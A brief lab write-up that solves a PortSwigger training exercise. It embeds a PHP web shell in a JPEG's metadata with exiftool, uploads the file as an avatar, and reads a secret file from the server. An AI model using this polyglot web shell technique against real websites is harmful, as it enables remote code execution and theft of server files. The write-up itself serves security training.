Remote code execution via polyglot web shell uploa

Remote code execution via polyglot web shell upload

Solution

Login to website

L: wiener
P: peter

Preapre payload

┌──(kali㉿kali)-[~/Desktop/writeups/PortSwigger/Remote code execution via polyglot web shell upload]
└─$ exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" file.jpg -o hack.php
    1 image files created

Upload php shell

Read secret

https://0a84004f0411b04380d9f8cb00f80095.web-security-academy.net/files/avatars/hack.php

Submit solution

Secret: oArFqKYZEqHFGq7PvQvPUQoiJzJukR09